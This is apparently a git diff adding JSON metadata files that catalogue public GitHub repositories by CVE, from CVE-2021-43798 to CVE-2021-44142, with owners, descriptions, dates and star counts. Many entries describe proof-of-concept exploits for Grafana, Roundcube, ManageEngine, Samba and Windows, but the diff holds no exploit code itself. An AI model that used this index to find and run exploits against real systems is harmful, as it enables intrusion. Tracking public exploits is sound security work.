+ "name": "CVE-2021-43798",
+ "full_name": "Iris288\/CVE-2021-43798",
+ "owner": {
+ "login": "Iris288",
+ "id": 101178777,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/101178777?v=4",
+ "html_url": "https:\/\/github.com\/Iris288"
+ },
+ "html_url": "https:\/\/github.com\/Iris288\/CVE-2021-43798",
+ "description": null,
+ "fork": false,
+ "created_at": "2023-11-21T11:24:54Z",
+ "updated_at": "2023-11-21T11:24:54Z",
+ "pushed_at": "2023-11-21T11:28:06Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 734375970,
+ "name": "CVE-2021-43798",
+ "full_name": "wagneralves\/CVE-2021-43798",
+ "owner": {
+ "login": "wagneralves",
+ "id": 5523049,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/5523049?v=4",
+ "html_url": "https:\/\/github.com\/wagneralves"
+ },
+ "html_url": "https:\/\/github.com\/wagneralves\/CVE-2021-43798",
+ "description": "Directory Traversal and Arbitrary File Read on Grafana",
+ "fork": false,
+ "created_at": "2023-12-21T14:24:53Z",
+ "updated_at": "2023-12-21T15:44:04Z",
+ "pushed_at": "2023-12-21T15:08:31Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 767120196,
+ "name": "CVE-2021-43798-EXPLOIT",
+ "full_name": "K3ysTr0K3R\/CVE-2021-43798-EXPLOIT",
+ "owner": {
+ "login": "K3ysTr0K3R",
+ "id": 70909693,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/70909693?v=4",
+ "html_url": "https:\/\/github.com\/K3ysTr0K3R"
+ },
+ "html_url": "https:\/\/github.com\/K3ysTr0K3R\/CVE-2021-43798-EXPLOIT",
+ "description": "A PoC exploit for CVE-2021-43798 - Grafana Directory Traversal",
+ "fork": false,
+ "created_at": "2024-03-04T18:32:21Z",
+ "updated_at": "2024-03-08T07:40:00Z",
+ "pushed_at": "2024-03-04T21:20:27Z",
+ "stargazers_count": 2,
+ "watchers_count": 2,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "cve-2021-43789",
+ "directory-traversal",
+ "directory-traversal-vulnerability",
+ "exploitation",
+ "exploits",
+ "grafana",
+ "hacking",
+ "information-disclosure",
+ "poc"
+ ],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 2,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 778520336,
+ "name": "CVE-2021-43798",
+ "full_name": "ticofookfook\/CVE-2021-43798",
+ "owner": {
+ "login": "ticofookfook",
+ "id": 99700348,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/99700348?v=4",
+ "html_url": "https:\/\/github.com\/ticofookfook"
+ },
+ "html_url": "https:\/\/github.com\/ticofookfook\/CVE-2021-43798",
+ "description": null,
+ "fork": false,
+ "created_at": "2024-03-27T21:47:06Z",
+ "updated_at": "2024-03-27T21:57:13Z",
+ "pushed_at": "2024-03-27T22:02:15Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 778979934,
+ "name": "CVE-2021-43798",
+ "full_name": "xchg-rax-rax\/CVE-2021-43798",
+ "owner": {
+ "login": "xchg-rax-rax",
+ "id": 95374341,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/95374341?v=4",
+ "html_url": "https:\/\/github.com\/xchg-rax-rax"
+ },
+ "html_url": "https:\/\/github.com\/xchg-rax-rax\/CVE-2021-43798",
+ "description": "Exploit for CVE-2021-43798",
+ "fork": false,
+ "created_at": "2024-03-28T19:45:48Z",
+ "updated_at": "2024-05-29T11:53:03Z",
+ "pushed_at": "2024-03-28T19:46:02Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 791503372,
+ "name": "CVE-2021-43798",
+ "full_name": "topyagyuu\/CVE-2021-43798",
+ "owner": {
+ "login": "topyagyuu",
+ "id": 167684629,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/167684629?v=4",
+ "html_url": "https:\/\/github.com\/topyagyuu"
+ },
+ "html_url": "https:\/\/github.com\/topyagyuu\/CVE-2021-43798",
+ "description": null,
+ "fork": false,
+ "created_at": "2024-04-24T20:47:29Z",
+ "updated_at": "2024-05-01T19:11:37Z",
+ "pushed_at": "2024-04-26T11:36:58Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 817530776,
+ "name": "CVE-2021-43798",
+ "full_name": "MalekAlthubiany\/CVE-2021-43798",
+ "owner": {
+ "login": "MalekAlthubiany",
+ "id": 127455300,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/127455300?v=4",
+ "html_url": "https:\/\/github.com\/MalekAlthubiany"
+ },
+ "html_url": "https:\/\/github.com\/MalekAlthubiany\/CVE-2021-43798",
+ "description": null,
+ "fork": false,
+ "created_at": "2024-06-19T23:27:01Z",
+ "updated_at": "2024-06-20T04:11:01Z",
+ "pushed_at": "2024-06-20T04:10:58Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-43799.json b/2021/CVE-2021-43799.json
new file mode 100644
index 0000000000..736c877479
--- /dev/null
+++ b/2021/CVE-2021-43799.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 436070129,
+ "name": "CVE-2021-43799",
+ "full_name": "scopion\/CVE-2021-43799",
+ "owner": {
+ "login": "scopion",
+ "id": 27413591,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/27413591?v=4",
+ "html_url": "https:\/\/github.com\/scopion"
+ },
+ "html_url": "https:\/\/github.com\/scopion\/CVE-2021-43799",
+ "description": "Python Exploit Code ",
+ "fork": false,
+ "created_at": "2021-12-08T00:47:00Z",
+ "updated_at": "2023-09-28T11:33:51Z",
+ "pushed_at": "2021-12-08T00:40:16Z",
+ "stargazers_count": 2,
+ "watchers_count": 2,
+ "has_discussions": false,
+ "forks_count": 2,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 2,
+ "watchers": 2,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-43811.json b/2021/CVE-2021-43811.json
new file mode 100644
index 0000000000..c5964bd2e5
--- /dev/null
+++ b/2021/CVE-2021-43811.json
@@ -0,0 +1,39 @@
+[
+ {
+ "id": 527150878,
+ "name": "CVE-2021-43811",
+ "full_name": "s-index\/CVE-2021-43811",
+ "owner": {
+ "login": "s-index",
+ "id": 56715563,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/56715563?v=4",
+ "html_url": "https:\/\/github.com\/s-index"
+ },
+ "html_url": "https:\/\/github.com\/s-index\/CVE-2021-43811",
+ "description": "awslabs\/sockeye Code injection via unsafe YAML loading CVE-2021-43811",
+ "fork": false,
+ "created_at": "2022-08-21T08:44:31Z",
+ "updated_at": "2023-09-28T11:42:04Z",
+ "pushed_at": "2022-08-21T09:30:02Z",
+ "stargazers_count": 4,
+ "watchers_count": 4,
+ "has_discussions": false,
+ "forks_count": 2,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "awslabs",
+ "code-injection",
+ "cve-2021-43811",
+ "poc",
+ "sockeye",
+ "unsafe-yaml-load"
+ ],
+ "visibility": "public",
+ "forks": 2,
+ "watchers": 4,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-43821.json b/2021/CVE-2021-43821.json
new file mode 100644
index 0000000000..ed2afc84dd
--- /dev/null
+++ b/2021/CVE-2021-43821.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 441849792,
+ "name": "opencast-CVE-2021-43821-env",
+ "full_name": "Jackey0\/opencast-CVE-2021-43821-env",
+ "owner": {
+ "login": "Jackey0",
+ "id": 52018740,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/52018740?v=4",
+ "html_url": "https:\/\/github.com\/Jackey0"
+ },
+ "html_url": "https:\/\/github.com\/Jackey0\/opencast-CVE-2021-43821-env",
+ "description": "opencast cve-2021-43821敏感信息泄露漏洞环境",
+ "fork": false,
+ "created_at": "2021-12-26T09:04:43Z",
+ "updated_at": "2021-12-27T12:18:04Z",
+ "pushed_at": "2021-12-27T07:42:58Z",
+ "stargazers_count": 3,
+ "watchers_count": 3,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 3,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-43848.json b/2021/CVE-2021-43848.json
new file mode 100644
index 0000000000..12c8a05d73
--- /dev/null
+++ b/2021/CVE-2021-43848.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 455242168,
+ "name": "hui2ochko",
+ "full_name": "neex\/hui2ochko",
+ "owner": {
+ "login": "neex",
+ "id": 684237,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/684237?v=4",
+ "html_url": "https:\/\/github.com\/neex"
+ },
+ "html_url": "https:\/\/github.com\/neex\/hui2ochko",
+ "description": "exploit for CVE-2021-43848",
+ "fork": false,
+ "created_at": "2022-02-03T16:31:13Z",
+ "updated_at": "2024-02-18T11:39:00Z",
+ "pushed_at": "2022-02-03T16:36:55Z",
+ "stargazers_count": 10,
+ "watchers_count": 10,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 10,
+ "score": 0,
+ "subscribers_count": 2
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-43857.json b/2021/CVE-2021-43857.json
new file mode 100644
index 0000000000..379aea052f
--- /dev/null
+++ b/2021/CVE-2021-43857.json
@@ -0,0 +1,62 @@
+[
+ {
+ "id": 444133204,
+ "name": "CVE-2021-43857",
+ "full_name": "LongWayHomie\/CVE-2021-43857",
+ "owner": {
+ "login": "LongWayHomie",
+ "id": 63229183,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/63229183?v=4",
+ "html_url": "https:\/\/github.com\/LongWayHomie"
+ },
+ "html_url": "https:\/\/github.com\/LongWayHomie\/CVE-2021-43857",
+ "description": "Gerapy prior to version 0.9.8 is vulnerable to remote code execution. This issue is patched in version 0.9.8.",
+ "fork": false,
+ "created_at": "2022-01-03T16:47:42Z",
+ "updated_at": "2024-04-18T18:30:48Z",
+ "pushed_at": "2022-01-03T16:53:04Z",
+ "stargazers_count": 4,
+ "watchers_count": 4,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 4,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 485594121,
+ "name": "CVE-2021-43857",
+ "full_name": "lowkey0808\/CVE-2021-43857",
+ "owner": {
+ "login": "lowkey0808",
+ "id": 49674960,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/49674960?v=4",
+ "html_url": "https:\/\/github.com\/lowkey0808"
+ },
+ "html_url": "https:\/\/github.com\/lowkey0808\/CVE-2021-43857",
+ "description": "CVE-2021-43857(gerapy命令执行)",
+ "fork": false,
+ "created_at": "2022-04-26T01:38:06Z",
+ "updated_at": "2022-04-28T02:08:14Z",
+ "pushed_at": "2022-04-26T01:53:07Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-43858.json b/2021/CVE-2021-43858.json
new file mode 100644
index 0000000000..b241c62d8b
--- /dev/null
+++ b/2021/CVE-2021-43858.json
@@ -0,0 +1,62 @@
+[
+ {
+ "id": 444140549,
+ "name": "cve-2021-43858",
+ "full_name": "0rx1\/cve-2021-43858",
+ "owner": {
+ "login": "0rx1",
+ "id": 12779060,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/12779060?v=4",
+ "html_url": "https:\/\/github.com\/0rx1"
+ },
+ "html_url": "https:\/\/github.com\/0rx1\/cve-2021-43858",
+ "description": null,
+ "fork": false,
+ "created_at": "2022-01-03T17:11:54Z",
+ "updated_at": "2023-11-18T03:11:06Z",
+ "pushed_at": "2022-01-03T14:15:40Z",
+ "stargazers_count": 4,
+ "watchers_count": 4,
+ "has_discussions": false,
+ "forks_count": 9,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 9,
+ "watchers": 4,
+ "score": 0,
+ "subscribers_count": 0
+ },
+ {
+ "id": 626802613,
+ "name": "CVE-2021-43858-MinIO",
+ "full_name": "khuntor\/CVE-2021-43858-MinIO",
+ "owner": {
+ "login": "khuntor",
+ "id": 25006917,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/25006917?v=4",
+ "html_url": "https:\/\/github.com\/khuntor"
+ },
+ "html_url": "https:\/\/github.com\/khuntor\/CVE-2021-43858-MinIO",
+ "description": null,
+ "fork": false,
+ "created_at": "2023-04-12T07:34:03Z",
+ "updated_at": "2023-04-12T07:35:27Z",
+ "pushed_at": "2023-04-12T07:38:33Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-43883.json b/2021/CVE-2021-43883.json
new file mode 100644
index 0000000000..aea72c2f64
--- /dev/null
+++ b/2021/CVE-2021-43883.json
@@ -0,0 +1,38 @@
+[
+ {
+ "id": 434345250,
+ "name": "shakeitoff",
+ "full_name": "jbaines-r7\/shakeitoff",
+ "owner": {
+ "login": "jbaines-r7",
+ "id": 91965877,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/91965877?v=4",
+ "html_url": "https:\/\/github.com\/jbaines-r7"
+ },
+ "html_url": "https:\/\/github.com\/jbaines-r7\/shakeitoff",
+ "description": "Windows MSI Installer LPE (CVE-2021-43883)",
+ "fork": false,
+ "created_at": "2021-12-02T19:15:59Z",
+ "updated_at": "2024-05-17T01:04:26Z",
+ "pushed_at": "2021-12-17T12:53:51Z",
+ "stargazers_count": 76,
+ "watchers_count": 76,
+ "has_discussions": false,
+ "forks_count": 18,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "cve-2021-41379",
+ "cve-2021-43883",
+ "exploit",
+ "lpe",
+ "windows"
+ ],
+ "visibility": "public",
+ "forks": 18,
+ "watchers": 76,
+ "score": 0,
+ "subscribers_count": 3
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-43891.json b/2021/CVE-2021-43891.json
new file mode 100644
index 0000000000..fdae787317
--- /dev/null
+++ b/2021/CVE-2021-43891.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 440311834,
+ "name": "code-wsl-rce",
+ "full_name": "parsiya\/code-wsl-rce",
+ "owner": {
+ "login": "parsiya",
+ "id": 3981231,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/3981231?v=4",
+ "html_url": "https:\/\/github.com\/parsiya"
+ },
+ "html_url": "https:\/\/github.com\/parsiya\/code-wsl-rce",
+ "description": "Proof of Concept for CVE-2021-43891",
+ "fork": false,
+ "created_at": "2021-12-20T21:30:51Z",
+ "updated_at": "2022-06-29T10:46:22Z",
+ "pushed_at": "2021-12-27T17:00:25Z",
+ "stargazers_count": 3,
+ "watchers_count": 3,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 3,
+ "score": 0,
+ "subscribers_count": 2
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-43893.json b/2021/CVE-2021-43893.json
new file mode 100644
index 0000000000..dea89914df
--- /dev/null
+++ b/2021/CVE-2021-43893.json
@@ -0,0 +1,37 @@
+[
+ {
+ "id": 455631614,
+ "name": "blankspace",
+ "full_name": "jbaines-r7\/blankspace",
+ "owner": {
+ "login": "jbaines-r7",
+ "id": 91965877,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/91965877?v=4",
+ "html_url": "https:\/\/github.com\/jbaines-r7"
+ },
+ "html_url": "https:\/\/github.com\/jbaines-r7\/blankspace",
+ "description": "Proof of Concept for EFSRPC Arbitrary File Upload (CVE-2021-43893)",
+ "fork": false,
+ "created_at": "2022-02-04T17:11:00Z",
+ "updated_at": "2024-05-30T08:10:14Z",
+ "pushed_at": "2022-02-14T14:26:26Z",
+ "stargazers_count": 62,
+ "watchers_count": 62,
+ "has_discussions": false,
+ "forks_count": 14,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "cve-2021-43893",
+ "exploit",
+ "poc",
+ "windows"
+ ],
+ "visibility": "public",
+ "forks": 14,
+ "watchers": 62,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-43908.json b/2021/CVE-2021-43908.json
new file mode 100644
index 0000000000..6f2b12320b
--- /dev/null
+++ b/2021/CVE-2021-43908.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 523963941,
+ "name": "vscode-rce-electrovolt",
+ "full_name": "Sudistark\/vscode-rce-electrovolt",
+ "owner": {
+ "login": "Sudistark",
+ "id": 31372554,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/31372554?v=4",
+ "html_url": "https:\/\/github.com\/Sudistark"
+ },
+ "html_url": "https:\/\/github.com\/Sudistark\/vscode-rce-electrovolt",
+ "description": "Trying to reproduce CVE-2021-43908",
+ "fork": false,
+ "created_at": "2022-08-12T05:18:43Z",
+ "updated_at": "2024-01-17T03:16:39Z",
+ "pushed_at": "2022-08-14T12:01:31Z",
+ "stargazers_count": 7,
+ "watchers_count": 7,
+ "has_discussions": false,
+ "forks_count": 3,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 3,
+ "watchers": 7,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-43936.json b/2021/CVE-2021-43936.json
new file mode 100644
index 0000000000..c9d96a3251
--- /dev/null
+++ b/2021/CVE-2021-43936.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 437671075,
+ "name": "CVE-2021-43936",
+ "full_name": "LongWayHomie\/CVE-2021-43936",
+ "owner": {
+ "login": "LongWayHomie",
+ "id": 63229183,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/63229183?v=4",
+ "html_url": "https:\/\/github.com\/LongWayHomie"
+ },
+ "html_url": "https:\/\/github.com\/LongWayHomie\/CVE-2021-43936",
+ "description": "CVE-2021-43936 is a critical vulnerability (CVSS3 10.0) leading to Remote Code Execution (RCE) in WebHMI Firmware.",
+ "fork": false,
+ "created_at": "2021-12-12T22:31:00Z",
+ "updated_at": "2023-04-14T16:51:31Z",
+ "pushed_at": "2022-03-29T11:41:00Z",
+ "stargazers_count": 7,
+ "watchers_count": 7,
+ "has_discussions": false,
+ "forks_count": 7,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 7,
+ "watchers": 7,
+ "score": 0,
+ "subscribers_count": 2
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-44026.json b/2021/CVE-2021-44026.json
new file mode 100644
index 0000000000..f6180eb317
--- /dev/null
+++ b/2021/CVE-2021-44026.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 718579909,
+ "name": "roundcube-cve-2021-44026",
+ "full_name": "pentesttoolscom\/roundcube-cve-2021-44026",
+ "owner": {
+ "login": "pentesttoolscom",
+ "id": 101269191,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/101269191?v=4",
+ "html_url": "https:\/\/github.com\/pentesttoolscom"
+ },
+ "html_url": "https:\/\/github.com\/pentesttoolscom\/roundcube-cve-2021-44026",
+ "description": "A demo exploit for CVE-2021-44026, a SQL injection in Roundcube",
+ "fork": false,
+ "created_at": "2023-11-14T11:32:36Z",
+ "updated_at": "2024-05-17T08:32:31Z",
+ "pushed_at": "2023-12-22T11:29:43Z",
+ "stargazers_count": 9,
+ "watchers_count": 9,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 9,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-44077.json b/2021/CVE-2021-44077.json
new file mode 100644
index 0000000000..07c0c06d10
--- /dev/null
+++ b/2021/CVE-2021-44077.json
@@ -0,0 +1,62 @@
+[
+ {
+ "id": 436382060,
+ "name": "CVE-2021-44077",
+ "full_name": "horizon3ai\/CVE-2021-44077",
+ "owner": {
+ "login": "horizon3ai",
+ "id": 79593994,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/79593994?v=4",
+ "html_url": "https:\/\/github.com\/horizon3ai"
+ },
+ "html_url": "https:\/\/github.com\/horizon3ai\/CVE-2021-44077",
+ "description": "Proof of Concept Exploit for ManageEngine ServiceDesk Plus CVE-2021-44077",
+ "fork": false,
+ "created_at": "2021-12-08T20:24:38Z",
+ "updated_at": "2024-06-05T16:36:57Z",
+ "pushed_at": "2021-12-08T21:43:16Z",
+ "stargazers_count": 31,
+ "watchers_count": 31,
+ "has_discussions": false,
+ "forks_count": 11,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 11,
+ "watchers": 31,
+ "score": 0,
+ "subscribers_count": 4
+ },
+ {
+ "id": 543157100,
+ "name": "Golang-CVE-2021-44077-POC",
+ "full_name": "pizza-power\/Golang-CVE-2021-44077-POC",
+ "owner": {
+ "login": "pizza-power",
+ "id": 6135659,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/6135659?v=4",
+ "html_url": "https:\/\/github.com\/pizza-power"
+ },
+ "html_url": "https:\/\/github.com\/pizza-power\/Golang-CVE-2021-44077-POC",
+ "description": "Golang Proof of Concept Exploit for CVE-2021-44077: PreAuth RCE in ManageEngine ServiceDesk Plus < 11306",
+ "fork": false,
+ "created_at": "2022-09-29T14:07:54Z",
+ "updated_at": "2023-04-03T07:59:57Z",
+ "pushed_at": "2022-10-02T19:35:59Z",
+ "stargazers_count": 2,
+ "watchers_count": 2,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 2,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-44103.json b/2021/CVE-2021-44103.json
new file mode 100644
index 0000000000..e40a9c63c0
--- /dev/null
+++ b/2021/CVE-2021-44103.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 552445695,
+ "name": "CVE-2021-44103",
+ "full_name": "paulotrindadec\/CVE-2021-44103",
+ "owner": {
+ "login": "paulotrindadec",
+ "id": 94475244,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/94475244?v=4",
+ "html_url": "https:\/\/github.com\/paulotrindadec"
+ },
+ "html_url": "https:\/\/github.com\/paulotrindadec\/CVE-2021-44103",
+ "description": null,
+ "fork": false,
+ "created_at": "2022-10-16T16:02:47Z",
+ "updated_at": "2024-01-22T19:06:04Z",
+ "pushed_at": "2022-10-16T18:12:47Z",
+ "stargazers_count": 2,
+ "watchers_count": 2,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 2,
+ "score": 0,
+ "subscribers_count": 2
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-44117.json b/2021/CVE-2021-44117.json
new file mode 100644
index 0000000000..ac4663c808
--- /dev/null
+++ b/2021/CVE-2021-44117.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 474547570,
+ "name": "CVE-2021-44117",
+ "full_name": "warmachine-57\/CVE-2021-44117",
+ "owner": {
+ "login": "warmachine-57",
+ "id": 51786945,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/51786945?v=4",
+ "html_url": "https:\/\/github.com\/warmachine-57"
+ },
+ "html_url": "https:\/\/github.com\/warmachine-57\/CVE-2021-44117",
+ "description": null,
+ "fork": false,
+ "created_at": "2022-03-27T05:50:34Z",
+ "updated_at": "2022-03-27T05:50:34Z",
+ "pushed_at": "2022-06-10T08:30:56Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 2
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-44132.json b/2021/CVE-2021-44132.json
new file mode 100644
index 0000000000..1275f02861
--- /dev/null
+++ b/2021/CVE-2021-44132.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 463667316,
+ "name": "CVE-2021-44132",
+ "full_name": "exploitwritter\/CVE-2021-44132",
+ "owner": {
+ "login": "exploitwritter",
+ "id": 47488127,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/47488127?v=4",
+ "html_url": "https:\/\/github.com\/exploitwritter"
+ },
+ "html_url": "https:\/\/github.com\/exploitwritter\/CVE-2021-44132",
+ "description": "This script exploits a vulnerability in the OMCISHELL object for C-DATA proprietary routers such as BESTCOMs.",
+ "fork": false,
+ "created_at": "2022-02-25T20:30:05Z",
+ "updated_at": "2022-03-08T02:55:07Z",
+ "pushed_at": "2022-02-25T20:31:08Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2021/CVE-2021-44142.json b/2021/CVE-2021-44142.json
new file mode 100644
index 0000000000..093e10a9c8
--- /dev/null
+++ b/2021/CVE-2021-44142.json
@@ -0,0 +1,92 @@
+[
+ {
+ "id": 475550985,
+ "name": "Samba-CVE-2021-44142",
+ "full_name": "hrsman\/Samba-CVE-2021-44142",
+ "owner": {
+ "login": "hrsman",
+ "id": 102617131,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/102617131?v=4",
+ "html_url": "https:\/\/github.com\/hrsman"
+ },
+ "html_url": "https:\/\/github.com\/hrsman\/Samba-CVE-2021-44142",
+ "description": null,
+ "fork": false,
+ "created_at": "2022-03-29T17:32:25Z",
+ "updated_at": "2022-03-29T18:25:12Z",
+ "pushed_at": "2022-03-29T20:43:08Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
